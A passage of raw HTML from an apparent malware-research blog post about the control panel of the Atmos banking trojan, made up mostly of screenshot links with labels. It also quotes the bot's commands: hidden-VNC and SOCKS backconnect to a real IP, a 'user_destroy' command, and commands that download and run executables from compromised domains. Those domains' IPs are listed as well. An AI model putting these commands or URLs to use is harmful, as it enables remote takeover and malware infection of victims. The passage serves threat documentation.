href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEgO_exq3GQiPDwO1HbAAEQJTWkapQB3EiqrfpmpBcfe9NL5c4zv9VoUWx6XjhcDL8OJqeRD8xACEA-RmrTr5OBU88UlTkVZ-zJuFYQznqlAyUTMU8bhIN6y33WbtVpJhdiX8NdBe__cs/s1600/2015-11-02_16-38-11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="351" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEgO_exq3GQiPDwO1HbAAEQJTWkapQB3EiqrfpmpBcfe9NL5c4zv9VoUWx6XjhcDL8OJqeRD8xACEA-RmrTr5OBU88UlTkVZ-zJuFYQznqlAyUTMU8bhIN6y33WbtVpJhdiX8NdBe__cs/s400/2015-11-02_16-38-11.png" width="400" /></a></div> <br /> Webinjects for the group 'Canada':<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjB4acNrYEHDk15EsOyH18sRklY2Pdnt7IQZVUOfbzSHwexHlV0MZhUJBGDheE2A3X9ea69xIH-eaVBypey6A1EVYIzu6vKT5dHVpH1bK4ky0Pvmz9cGvHbZA3O5UF7oVX-MMhLWZE2nok/s1600/2015-11-17_15-40-05.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="260" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjB4acNrYEHDk15EsOyH18sRklY2Pdnt7IQZVUOfbzSHwexHlV0MZhUJBGDheE2A3X9ea69xIH-eaVBypey6A1EVYIzu6vKT5dHVpH1bK4ky0Pvmz9cGvHbZA3O5UF7oVX-MMhLWZE2nok/s400/2015-11-17_15-40-05.png" width="400" /></a></div> <br /> US:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOQJdZ22sOiGyeve-IDBXIFK4afmcl2U0DxTor_XKHV4A8wo3-yaPyu_ntNHzef-RkX75Xs3ZBKZ2ExQTD8bRxnGiaY41jl4SLH9tbEVenGKUbILk_vv9WZiTABHF6w8OvmRufkMOV-VI/s1600/2015-11-17_15-41-53.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="260" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOQJdZ22sOiGyeve-IDBXIFK4afmcl2U0DxTor_XKHV4A8wo3-yaPyu_ntNHzef-RkX75Xs3ZBKZ2ExQTD8bRxnGiaY41jl4SLH9tbEVenGKUbILk_vv9WZiTABHF6w8OvmRufkMOV-VI/s400/2015-11-17_15-41-53.png" width="400" /></a></div> <div class="separator" style="clear: both; text-align: center;"> </div> <br /> Edit a webinject:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHhw28B68xI1oZGbh91icWw32uAhlP9ArOdG2mU7hOOYSwN6to6bT5_bSo8NnM1VYqRc1gOzC2BIaGZtBOiVsPy1ZY0LRg_XBAvRI16mN_-XUaQ7GUrWCN63Hccp8MOf725TYWw26Wdwc/s1600/2015-11-17_15-41-06.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="260" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHhw28B68xI1oZGbh91icWw32uAhlP9ArOdG2mU7hOOYSwN6to6bT5_bSo8NnM1VYqRc1gOzC2BIaGZtBOiVsPy1ZY0LRg_XBAvRI16mN_-XUaQ7GUrWCN63Hccp8MOf725TYWw26Wdwc/s400/2015-11-17_15-41-06.png" width="400" /></a></div> <br /> Script:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4rghO8YIN0gVSLw0eRRIwxxx5baj3jH5tQ7M8yKoYpgUhs8gSBSlIV22VBoei9XVlfqZIz8tsiz3RuUn74Ya62TLrcPwLHPjGHePlhJvOcEZ3qz_2Xg4-63vfEXuglgM5goRGlnJ_6Co/s1600/2015-11-02_16-39-13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="351" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4rghO8YIN0gVSLw0eRRIwxxx5baj3jH5tQ7M8yKoYpgUhs8gSBSlIV22VBoei9XVlfqZIz8tsiz3RuUn74Ya62TLrcPwLHPjGHePlhJvOcEZ3qz_2Xg4-63vfEXuglgM5goRGlnJ_6Co/s400/2015-11-02_16-39-13.png" width="400" /></a></div> <br /> Script edit:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjL525mIDDvn556Q9R9EGButIiM_0J-js-V-36h1fGNPPuXJQh_yihbB2i5xyDf30zUsJbLvA_Px5u68dtoav7ATTFb7IOw9IDgpadEfO7aJQxjx3nghVRXeFLTu5Cppj3soYFvz4fBSeM/s1600/2015-11-02_16-45-56.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="351" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjL525mIDDvn556Q9R9EGButIiM_0J-js-V-36h1fGNPPuXJQh_yihbB2i5xyDf30zUsJbLvA_Px5u68dtoav7ATTFb7IOw9IDgpadEfO7aJQxjx3nghVRXeFLTu5Cppj3soYFvz4fBSeM/s400/2015-11-02_16-45-56.png" width="400" /></a></div> <br /> Some scripts sample:<br /> <div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"> tokenspy_update tokenspy-config.json<br /> hvnc_start 176.9.174.237 29223<br /> bot_bc_add vnc<br /> bot_bc_add socks 176.9.174.237 37698<br /> user_execute http://iguana58.ru/plugins/system/anticopy/ammy.exe<br /> transfer<br /> user_destroy<br /> user_execute http://iguana58.ru/plugins/system/anticopy/adobe.exe<br /> user_ftpclients_get<br /> user_execute htxp://iguana58.ru/plugins/system/anticopy/adobe.exe<br /> user_execute htxp://mareikes.com/wp-includes/pomo/svhost.exe -f<br /> user_execute htxp://mareikes.com/wp-includes/pomo/server.exe<br /> user_execute htxp://mareikes.com/wp-includes/pomo/ammy.exe<br /> user_execute http://tehnoart.co/sr.exe -f<br /> user_execute http://3dmaxkursum.net/tmp/sys/config.exe<br /> user_execute http://coasttransit.com/wp-content/gallery/gulfport-transit-center/thumbs/htasees.exe</div> • dns: 1 ›› ip: 185.4.73.33 - adress: IGUANA58.RU<br /> • dns: 1 ›› ip: 176.9.24.49 - adress: MAREIKES.COM<br /> • dns: 1 ›› ip: 107.180.26.93 - adress: TEHNOART.CO<br /> • dns: 1 ›› ip: 94.73.144.210 - adress: 3DMAXKURSUM.NET<br /> • dns: 1 ›› ip: 184.168.47.225 - adress: COASTTRANSIT.COM<br /> <br /> <br /> Socks:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-t0qGZ3ckAgrWQgbuMAFOu9hq0nVCBCqmgUCzvt5HCBfNVRTPta4tSyMeQ0pIFYCkra_XFXbPh_43mtHDlidh0TC1LiFC45BydUAchw53Au52JP6DTLeyBZVlGwPxN8n7zUjOdjbBFKE/s1600/2015-11-02_16-47-00.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="351" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-t0qGZ3ckAgrWQgbuMAFOu9hq0nVCBCqmgUCzvt5HCBfNVRTPta4tSyMeQ0pIFYCkra_XFXbPh_43mtHDlidh0TC1LiFC45BydUAchw53Au52JP6DTLeyBZVlGwPxN8n7zUjOdjbBFKE/s400/2015-11-02_16-47-00.png" width="400" /></a></div> <br /> VNC:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgo5dofRVUnBqY1ZR0IW-fBgLt0zknOolBQVn1b_FCLaT1n6-5T6VvIR2HyUxIzIBl4Gm_zFOcTiobgoFKh88rAs7c3qaeXjxPZK88WH3B8n0LDxPpYq_Ke8BF2_OciqQo0swefW8siils/s1600/2015-11-02_16-48-03.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="351" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgo5dofRVUnBqY1ZR0IW-fBgLt0zknOolBQVn1b_FCLaT1n6-5T6VvIR2HyUxIzIBl4Gm_zFOcTiobgoFKh88rAs7c3qaeXjxPZK88WH3B8n0LDxPpYq_Ke8BF2_OciqQo0swefW8siils/s400/2015-11-02_16-48-03.png" width="400" /></a></div> <br /> Example of infected endpoints:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhshbOF43LaZ381Z1V13Ah9PexzKmFqyKshQZelGoOdOIei7e9E5Z7Sza0xlRIIhDHx-DBM1shQYRjTtD4sdb9O5lJEgDa18WLVF_0td3mGHreSEa3Ik3svR5IexI_zKsHtGj4SVRoK1e8/s1600/2015-11-06_12-22-18.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="238" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhshbOF43LaZ381Z1V13Ah9PexzKmFqyKshQZelGoOdOIei7e9E5Z7Sza0xlRIIhDHx-DBM1shQYRjTtD4sdb9O5lJEgDa18WLVF_0td3mGHreSEa3Ik3svR5IexI_zKsHtGj4SVRoK1e8/s400/2015-11-06_12-22-18.png" width="400" /></a></div> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvPCzvXkkMcW36qBqt_3LI188sJmp1UTFqK6Q3sR66tGJ2QaSp2M7ZqKCo8gM4FNffak7edY0RqZC8djmzpTdHYgOzGgiCMGJiBDGJXDprcgAiulBTefCgu6-kScT7dlFvMNJhYx6U1yo/s1600/2015-11-05_18-41-40.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="323" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvPCzvXkkMcW36qBqt_3LI188sJmp1UTFqK6Q3sR66tGJ2QaSp2M7ZqKCo8gM4FNffak7edY0RqZC8djmzpTdHYgOzGgiCMGJiBDGJXDprcgAiulBTefCgu6-kScT7dlFvMNJhYx6U1yo/s400/2015-11-05_18-41-40.jpg" width="400" /></a></div> <br /> Config:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXUGxDPpRq1logIxAJNfEwR4LyhW-wuvaGyTjoNSUNWRxb7UAOJomcAYN8DrPezD6b-IO3Ar7CnmX_nHufUHclGCylwo58rZSdz3GEK3d5F1u-gG-m7TwmFcO8p1SZUkHJUXqrBhvlcqw/s1600/2015-11-02_19-37-40.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="165" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXUGxDPpRq1logIxAJNfEwR4LyhW-wuvaGyTjoNSUNWRxb7UAOJomcAYN8DrPezD6b-IO3Ar7CnmX_nHufUHclGCylwo58rZSdz3GEK3d5F1u-gG-m7TwmFcO8p1SZUkHJUXqrBhvlcqw/s400/2015-11-02_19-37-40.png" width="400" /></a></div> <br /> Backconnect logs:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOjzDdz8xf_FLouJB_56sdMr37HJTJ7G6C7BCzK0kBBeGzsPQm5k5wQTfogFLEFhq3Lcx6l6TcqurWcAptDAFVKGLRKF3hyphenhyphen-mY2yOc8fZjsXHuSC3jN0Iw-H15SlasuwdBAV5IAe73BEw/s1600/2015-11-29_13-29-21.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOjzDdz8xf_FLouJB_56sdMr37HJTJ7G6C7BCzK0kBBeGzsPQm5k5wQTfogFLEFhq3Lcx6l6TcqurWcAptDAFVKGLRKF3hyphenhyphen-mY2yOc8fZjsXHuSC3jN0Iw-H15SlasuwdBAV5IAe73BEw/s400/2015-11-29_13-29-21.png" width="315" /></a></div> <br /> Files:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjazG01rZwPcavS0moKTzQVxuzpo8Dml_hznJiXD8HIFQGUaF2fWUxJ1TYRLvpHWAEhrqyfQkFxaNkMnS5EZDAhLwXVzkx5SVOjlEJ6Ld08RL5Y0fQzG4EP16PkFrceJAn43cOSz1G6WZU/s1600/2015-11-29_14-21-41.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="276" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjazG01rZwPcavS0moKTzQVxuzpo8Dml_hznJiXD8HIFQGUaF2fWUxJ1TYRLvpHWAEhrqyfQkFxaNkMnS5EZDAhLwXVzkx5SVOjlEJ6Ld08RL5Y0fQzG4EP16PkFrceJAn43cOSz1G6WZU/s400/2015-11-29_14-21-41.png" width="400" /></a></div> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg27ykKKn-JPj3HP9DtawGtS4Frn659V9Ec-7dMM_1UFZfZ8AHVYJdcTnghyphenhyphen6MRWa2sdOiF6xo05qSz9YM4MMsB7zoaGqThpfN1uWs9JtSpzo9ZdxtZTPMcNkdMz45NsMuB0EsaQ087Ies/s1600/2015-11-29_14-27-29.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="197" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg27ykKKn-JPj3HP9DtawGtS4Frn659V9Ec-7dMM_1UFZfZ8AHVYJdcTnghyphenhyphen6MRWa2sdOiF6xo05qSz9YM4MMsB7zoaGqThpfN1uWs9JtSpzo9ZdxtZTPMcNkdMz45NsMuB0EsaQ087Ies/s400/2015-11-29_14-27-29.png" width="400" /></a></div> SHA1: 9EA4041C41C3448E5A9D00EEA9DACB9E11EBA6C0<br /> <br /> bcservice.ini:<br /> <div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"> <span class="br0">[</span>bcservice<span class="br0">]</span><br /> client_starting_port=200<br /> bots_port=30<br /> reboot_every_m=10</div> <br /> Trashed binnaries:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtgSU1F_S5dwnXeW_kntpJt9qdL9mtXDiEt_E0WhBnO6p6gtoFzvGSbSttM3eJTepqZ9enptulPDvaNYsSxxYrW3tHGhA4irt-VJcHPIBZVIc0baTD96oTvsrUwb2kVIq9KBR7NJI0rkg/s1600/2015-11-29_14-37-02.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="147" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtgSU1F_S5dwnXeW_kntpJt9qdL9mtXDiEt_E0WhBnO6p6gtoFzvGSbSttM3eJTepqZ9enptulPDvaNYsSxxYrW3tHGhA4irt-VJcHPIBZVIc0baTD96oTvsrUwb2kVIq9KBR7NJI0rkg/s400/2015-11-29_14-37-02.png" width="400" /></a></div> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrXvZMLtEMc4mNUqI3kWAEVDIUy-MjnpRCL0PmTCYdZgV0u2egn9tE_AzkiLx54ImaR6IAJ2LY6b12vobLxyQpEbzC-dtjUYPSuvYRib0uZfbouGV7MdUvTU0M84Lkpw0HpCxdywvd5os/s1600/2015-11-29_14-45-56.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="197" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrXvZMLtEMc4mNUqI3kWAEVDIUy-MjnpRCL0PmTCYdZgV0u2egn9tE_AzkiLx54ImaR6IAJ2LY6b12vobLxyQpEbzC-dtjUYPSuvYRib0uZfbouGV7MdUvTU0M84Lkpw0HpCxdywvd5os/s400/2015-11-29_14-45-56.png" width="400" /></a></div> SHA1: 987B468DB8AA400171E5365E89C3120F13F728EE<br /> <br /> Atmos builder:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAkHNZAZg_dBQ3WqkOkmAYJJizdEu6J9KKq7O2gojlXqAQmbTxvEARYUGxEEDCKYjgWTvcIUAGGTQpdP6CjWocFYYnMNEf27RttyyT6p14a8qsISUn16G4Jp-IYZ_0g0V1WZnI6twAjvw/s1600/2016-05-03_19-01-18.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="391" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAkHNZAZg_dBQ3WqkOkmAYJJizdEu6J9KKq7O2gojlXqAQmbTxvEARYUGxEEDCKYjgWTvcIUAGGTQpdP6CjWocFYYnMNEf27RttyyT6p14a8qsISUn16G4Jp-IYZ_0g0V1WZnI6twAjvw/s400/2016-05-03_19-01-18.png" width="400" /></a></div> &nbsp;SHA1: D3F992DCDBB0DF54C4A383163172F69A1CA967AE<br /> <br /> Server logs start the 3 oct 2015:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQLpP06lxTFk8L3g7piFIAvFZuYyk-YFHDP540K05H8tZq3kKWfWFMvVameH4_AryVi46RJz04M-ENSYuFKpSVLV2swB1joowM3oEnaNT_xS3IJJjI9z48V_A1OcbznUfMdyN7T87nWnc/s1600/2015-11-29_14-59-18.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="73" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQLpP06lxTFk8L3g7piFIAvFZuYyk-YFHDP540K05H8tZq3kKWfWFMvVameH4_AryVi46RJz04M-ENSYuFKpSVLV2swB1joowM3oEnaNT_xS3IJJjI9z48V_A1OcbznUfMdyN7T87nWnc/s400/2015-11-29_14-59-18.png" width="400" /></a></div> <br /> TokenSpy:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoj4fQmh7NzHDAMnv701YXpOWLneFH0jBRWebv89kH0HLNlzXydH2eIXzDJOqzM-dUOiGaXLY_KSUfsyYRzOobQ4wjHLGGlXwl2xnMSNTSxWNKAXChD8dLbN0J74-0nZjkRqVlrKqiBwM/s1600/2015-11-02_16-48-56.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhoj4fQmh7NzHDAMnv701YXpOWLneFH0jBRWebv89kH0HLNlzXydH2eIXzDJOqzM-dUOiGaXLY_KSUfsyYRzOobQ4wjHLGGlXwl2xnMSNTSxWNKAXChD8dLbN0J74-0nZjkRqVlrKqiBwM/s400/2015-11-02_16-48-56.png" width="400" /></a></div> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmIIvJ8Lm3e5oLrp9xtTc6RcfxI9tZ2JFrrHW8A7VV9K5SKI3CwcVwB4ysw34rYFNAxTieFfbzOD9nmaabTFQFjmHy6Hf3peIiJruYOWjTfQEjbIA8wfpuAcNr3JXtec40D_kkLZ96WxM/s1600/2016-02-18_19-15-34.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmIIvJ8Lm3e5oLrp9xtTc6RcfxI9tZ2JFrrHW8A7VV9K5SKI3CwcVwB4ysw34rYFNAxTieFfbzOD9nmaabTFQFjmHy6Hf3peIiJruYOWjTfQEjbIA8wfpuAcNr3JXtec40D_kkLZ96WxM/s400/2016-02-18_19-15-34.png" width="400" /></a></div> With a nice ring animation :)<br /> <br /> Rule/test:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwEZd-D8ypPciRAA8LeWVC01CKlM0halbrYP6TFXwU4AwxDKSpZq-TCD0xH0GPCX6cgUpWDRga2IRNPxwFVI8HwF2cCQUTRr7mOTbBv6xDm6YYsSPypch7Pbltk2jFj-dQZvXRAqhRfec/s1600/2015-11-02_16-49-38.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwEZd-D8ypPciRAA8LeWVC01CKlM0halbrYP6TFXwU4AwxDKSpZq-TCD0xH0GPCX6cgUpWDRga2IRNPxwFVI8HwF2cCQUTRr7mOTbBv6xDm6YYsSPypch7Pbltk2jFj-dQZvXRAqhRfec/s400/2015-11-02_16-49-38.png" width="400" /></a></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_HUccXW_a_ajen4ih1uAqTD2g-fgSFQCvWqJXLgeeKSB6DsUrkGZY3qy-EnKuDCoSoyjz4_-09wCBEq9pkyRHh8g71GyJxwD-HI54sQHWWGmPiY0btF1QyDG6HiDHQfdKU3yLaR5lRnc/s1600/2015-11-02_16-50-51.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_HUccXW_a_ajen4ih1uAqTD2g-fgSFQCvWqJXLgeeKSB6DsUrkGZY3qy-EnKuDCoSoyjz4_-09wCBEq9pkyRHh8g71GyJxwD-HI54sQHWWGmPiY0btF1QyDG6HiDHQfdKU3yLaR5lRnc/s400/2015-11-02_16-50-51.png" width="400" /></a></div> <br /> &nbsp;Search database:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjF78vyKq8bU5LDKQeSOEG4z2BeJsFmM9r4a2KmoJcqH26prqQg1D0I9xG8_5qdGW4auh00vHwX2syPcgK-bVkNjPV9yRwwEB50yKKdrvTG7tDrTuftN6Kwsmz3pMh5EO8lmK6O5zqOcjE/s1600/2015-11-02_16-51-36.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjF78vyKq8bU5LDKQeSOEG4z2BeJsFmM9r4a2KmoJcqH26prqQg1D0I9xG8_5qdGW4auh00vHwX2syPcgK-bVkNjPV9yRwwEB50yKKdrvTG7tDrTuftN6Kwsmz3pMh5EO8lmK6O5zqOcjE/s400/2015-11-02_16-51-36.png" width="400" /></a></div> <div class="separator" style="clear: both; text-align: center;"> </div> &nbsp;Search list:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg__OUS8D52psmOZYzq3kwvR7y4vVID6ukOf4ZshvVItlDOlGH_c0EFt5VvQoS0kqxHX_wGhKkUlFgVe-mSwsvnd1hH0mut7grwKcjFBtska22iDuqK-jNb8d-qxk-NZfILoWHpCN5V1c4/s1600/2015-11-02_16-52-31.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg__OUS8D52psmOZYzq3kwvR7y4vVID6ukOf4ZshvVItlDOlGH_c0EFt5VvQoS0kqxHX_wGhKkUlFgVe-mSwsvnd1hH0mut7grwKcjFBtska22iDuqK-jNb8d-qxk-NZfILoWHpCN5V1c4/s1600/2015-11-02_16-52-31.png" /></a></div> <br /> Setup:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoTeRV96D_LTGURQEABPiPcwTDdBVC7b_QtQXxD5_DMTih72PjDuln4NoMy_vUN73_ZIQnjh5ViUdhWJ_kHuK_HgJzjonAxPlJqLDYhqtC7MV3_oQHtZt8aoPucjpPROk0ZNQjtqsM3e8/s1600/2015-11-22_15-46-32.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoTeRV96D_LTGURQEABPiPcwTDdBVC7b_QtQXxD5_DMTih72PjDuln4NoMy_vUN73_ZIQnjh5ViUdhWJ_kHuK_HgJzjonAxPlJqLDYhqtC7MV3_oQHtZt8aoPucjpPROk0ZNQjtqsM3e8/s400/2015-11-22_15-46-32.png" width="351" /></a></div> With a reference to citadel.<br /> <br /> Report:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_dY8BE8vLcTWWe5YbPRFmGvpxCVd70qhHw5-Kx70FnGTXDRhle5ZL5h-DghIAZ4pivd7utyIZJYL824d8TNNxLElcN6rnKHdI0DySQb9TjtJPNAPxVVgGfJorx0BCbj4k3qM4Ge6vrIM/s1600/2015-11-02_19-44-40.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="230" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_dY8BE8vLcTWWe5YbPRFmGvpxCVd70qhHw5-Kx70FnGTXDRhle5ZL5h-DghIAZ4pivd7utyIZJYL824d8TNNxLElcN6rnKHdI0DySQb9TjtJPNAPxVVgGfJorx0BCbj4k3qM4Ge6vrIM/s400/2015-11-02_19-44-40.png" width="400" /></a></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgx0tFkKvb7ijlAC2BfTcGpi-coK-CiZmarzBIM3sihW-Gjz9X-KBCRWf9h_tNJIg_2weqHpcai1FT9F_BKtEmULHX79mA_Ka7F2oLURZ7EE2B72vhIKL17vY-7sjbVrxOeyxVEr1kp338/s1600/2015-11-02_19-49-19.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgx0tFkKvb7ijlAC2BfTcGpi-coK-CiZmarzBIM3sihW-Gjz9X-KBCRWf9h_tNJIg_2weqHpcai1FT9F_BKtEmULHX79mA_Ka7F2oLURZ7EE2B72vhIKL17vY-7sjbVrxOeyxVEr1kp338/s400/2015-11-02_19-49-19.png" width="400" /></a></div> <br /> Favorite reports:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLIcJGbxVu_wwDrHKU2fP8h289gj-UvAFL18xNonJQzYtXuVhfFEZhAgfZ8tbTL8vKI9dCIHHqhbKzyrCQ_UXRaOP61Sw0Fq6Tdab5UkEwM7-U0VAF-j17G7H4Fw267LNUN53DMXJe6NM/s1600/2015-11-02_16-58-04.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLIcJGbxVu_wwDrHKU2fP8h289gj-UvAFL18xNonJQzYtXuVhfFEZhAgfZ8tbTL8vKI9dCIHHqhbKzyrCQ_UXRaOP61Sw0Fq6Tdab5UkEwM7-U0VAF-j17G7H4Fw267LNUN53DMXJe6NM/s400/2015-11-02_16-58-04.png" width="400" /></a></div> <br /> Search in files:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwLn5kVj7yiK9HnMBBgIiaMS029ccVSNm0hG53CSDhn0sh_Ki2tLL9LTNd6U-v8NLQn13j3Du3hDrtvvQPaa-Z_XdngmGEf3S5qVRVTCHcOsBhvSiuj_Q8ChU_Irg5Al_CNruzpcuPYsM/s1600/2015-11-02_17-04-05.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="357" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwLn5kVj7yiK9HnMBBgIiaMS029ccVSNm0hG53CSDhn0sh_Ki2tLL9LTNd6U-v8NLQn13j3Du3hDrtvvQPaa-Z_XdngmGEf3S5qVRVTCHcOsBhvSiuj_Q8ChU_Irg5Al_CNruzpcuPYsM/s400/2015-11-02_17-04-05.png" width="400" /></a></div> <br /> Screenshot:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg178sc1iJm804d8qEExHnSQsFizPmihOBvr4T1Cn-IHfVeI-VHpcZemFMG3L1UwUIpuNHfWrlCMNT8yQ5WjrE93XU5K3HEBjyuNh7GiSPb955OY9XrXtXiGGtA0o79uYY9HNPZs7JdxgA/s1600/2015-11-02_17-04-43.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg178sc1iJm804d8qEExHnSQsFizPmihOBvr4T1Cn-IHfVeI-VHpcZemFMG3L1UwUIpuNHfWrlCMNT8yQ5WjrE93XU5K3HEBjyuNh7GiSPb955OY9XrXtXiGGtA0o79uYY9HNPZs7JdxgA/s400/2015-11-02_17-04-43.png" width="400" /></a></div> <br /> View videos:<br /> <div class="separator" style="clear: both; text-align: center;"> <a 